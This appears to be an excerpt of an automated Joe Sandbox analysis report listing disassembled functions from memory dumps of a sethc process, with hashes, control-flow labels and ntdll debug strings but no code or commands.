                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_4490000_sethc.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 370fb9c61f37cc3db535ff89912d9032470bfadb39d7b5466a82d80993fa62a7
                                                          • Instruction ID: e03302fdab4a8fb98b646f28e9f7ccf4159e2c06f294f8e60c73283b37bd76b8
                                                          • Opcode Fuzzy Hash: 370fb9c61f37cc3db535ff89912d9032470bfadb39d7b5466a82d80993fa62a7
                                                          • Instruction Fuzzy Hash: 7990023120504852F55071584514A46105597D0349F51C815A0055695DD735DD5AB661
                                                          Function 04502BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 421 4502bc0-4502bcc LdrInitializeThunk
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.46414434941.0000000004490000.00000040.00001000.00020000.00000000.sdmp, Offset: 04490000, based on PE: true
                                                          • Associated: 00000004.00000002.46414434941.00000000045B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.46414434941.00000000045BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_4490000_sethc.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 7ba2dab5d815fd4f013592f00feab4aecbf68175ab3b12f63fd4335a98fb4018
                                                          • Instruction ID: 876240dd12421c98c86dcfadd62197aae11905035ec171978d6a76e2231af09f
                                                          • Opcode Fuzzy Hash: 7ba2dab5d815fd4f013592f00feab4aecbf68175ab3b12f63fd4335a98fb4018
                                                          • Instruction Fuzzy Hash: F290023120100412F51075985518646104597E0345F51D815A5015556EC775D8967131
                                                          Function 04502B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 420 4502b90-4502b9c LdrInitializeThunk
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.46414434941.0000000004490000.00000040.00001000.00020000.00000000.sdmp, Offset: 04490000, based on PE: true
                                                          • Associated: 00000004.00000002.46414434941.00000000045B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.46414434941.00000000045BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_4490000_sethc.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: b7f4e68d767c8624c82b6d44ca32807e88ccf3c8990cef5de5120bdf1ca2fd00
                                                          • Instruction ID: 114ab992c1ad599dd910b388b418f560fae63382f59b4672e1ec12caa2240132
                                                          • Opcode Fuzzy Hash: b7f4e68d767c8624c82b6d44ca32807e88ccf3c8990cef5de5120bdf1ca2fd00
                                                          • Instruction Fuzzy Hash: DC90023120108812F5207158851474A104597D0345F55CC15A4415659DC7A5D8967121
                                                          Function 04502B80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 419 4502b80-4502b8c LdrInitializeThunk
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.46414434941.0000000004490000.00000040.00001000.00020000.00000000.sdmp, Offset: 04490000, based on PE: true
                                                          • Associated: 00000004.00000002.46414434941.00000000045B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.46414434941.00000000045BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_4490000_sethc.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: f06b510d6fa8bdf4926cc25dc59830b88495835ee15a43e38424680d4835cd25
                                                          • Instruction ID: cae1a82bbb070d55413bde4eeebca01d8b2a9280f3429f1fddf1115a2ad7efd5
                                                          • Opcode Fuzzy Hash: f06b510d6fa8bdf4926cc25dc59830b88495835ee15a43e38424680d4835cd25
                                                          • Instruction Fuzzy Hash: 6B90023120100852F51071584514B46104597E0345F51C81AA0115655DC725D8567521
                                                          Function 04502B2A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 411 4502b2a-4502b2f 412 4502b31-4502b38 411->412 413 4502b3f-4502b46 LdrInitializeThunk 411->413
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.46414434941.0000000004490000.00000040.00001000.00020000.00000000.sdmp, Offset: 04490000, based on PE: true
                                                          • Associated: 00000004.00000002.46414434941.00000000045B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.46414434941.00000000045BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_4490000_sethc.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: e6276fa7ab28728a456950de0ba33fe956762c699172460cbdb1da0e01012e11
                                                          • Instruction ID: 164e5a33bbd923cc29bd80ef2e62ccfe2719504d2aa39ae80aaf646cdf9c76e2
                                                          • Opcode Fuzzy Hash: e6276fa7ab28728a456950de0ba33fe956762c699172460cbdb1da0e01012e11
                                                          • Instruction Fuzzy Hash: 4FB09B71D014C5D5FB21EB60570C717794077D0745F15C455E1460685E4738D495F175
                                                          Function 001B87CC Relevance: 1.3, Strings: 1, Instructions: 57COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.46413558176.0000000000190000.00000040.80000000.00040000.00000000.sdmp, Offset: 00190000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_190000_sethc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: a
                                                          • API String ID: 0-3904355907
                                                          • Opcode ID: dba1d9ec92ac30fc22ba4fe2b419aab5a44d57008d1f369585167b006b604dd8
                                                          • Instruction ID: 2213afbb76398a4c31e1e2b6c6a6d72caeab0347daa68d5ed8b6ff83fb7f5281
                                                          • Opcode Fuzzy Hash: dba1d9ec92ac30fc22ba4fe2b419aab5a44d57008d1f369585167b006b604dd8
                                                          • Instruction Fuzzy Hash: 2A114862E14A42DFDB02DB70C8A52DABF62EF85B19B2E0599D0404A013DF715456CF84

                                                          Non-executed Functions

                                                          Function 043D04DF Relevance: .1, Instructions: 148COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.46414385536.00000000043D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_43d0000_sethc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2d88f2374b49e7d4b383fc7da09f8e76a2727e0ce3eaf4da2cd87d8c805e46d6
                                                          • Instruction ID: f27754249dfc528f0f430cb0c58d1944c3ea307806219bfa3988c5f4b36ffb2e
                                                          • Opcode Fuzzy Hash: 2d88f2374b49e7d4b383fc7da09f8e76a2727e0ce3eaf4da2cd87d8c805e46d6
                                                          • Instruction Fuzzy Hash: D541F47261DF094FD36CAE68A481276B3E2FB85308F10252DC886C3252EA74F8428784
                                                          Function 044F7550 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • Execute=1, xrefs: 0453451E
                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04534530
                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0453454D
                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 04534592
                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04534507
                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04534460
                                                          • ExecuteOptions, xrefs: 045344AB
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.46414434941.0000000004490000.00000040.00001000.00020000.00000000.sdmp, Offset: 04490000, based on PE: true
                                                          • Associated: 00000004.00000002.46414434941.00000000045B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.46414434941.00000000045BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_4490000_sethc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                          • API String ID: 0-484625025
                                                          • Opcode ID: 9d015ff616cc307a91924d5319d1324c19f36222c1f18ccacc285f2a56fece9e
                                                          • Instruction ID: eeb3bf11b5764e8fc95545e6f25b0f14d29a0aaa1a383a332251ac85304bf92f
                                                          • Opcode Fuzzy Hash: 9d015ff616cc307a91924d5319d1324c19f36222c1f18ccacc285f2a56fece9e
                                                          • Instruction Fuzzy Hash: D451FB31A002197AFF20AE94DC85FAE73A8FF58714F1404AAD705A7281E774BE55DF60
                                                          Function 044C9046 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.46414434941.0000000004490000.00000040.00001000.00020000.00000000.sdmp, Offset: 04490000, based on PE: true
                                                          • Associated: 00000004.00000002.46414434941.00000000045B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.46414434941.00000000045BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_4490000_sethc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $$@
                                                          • API String ID: 0-1194432280
                                                          • Opcode ID: 77d4f49c76fdd7509e050114ffd9e265aea991e91ffdcb7b3bb082c23133cc1e
                                                          • Instruction ID: 22efc7fc985e187b6bf3fd672e1d3e904ec352f3870629d5f36d41d99571a37e
                                                          • Opcode Fuzzy Hash: 77d4f49c76fdd7509e050114ffd9e265aea991e91ffdcb7b3bb082c23133cc1e
                                                          • Instruction Fuzzy Hash: 9D813BB5D002699BDB318F54CD45BEEB6B8BB08714F0441DBE909B7280E770AE84DFA1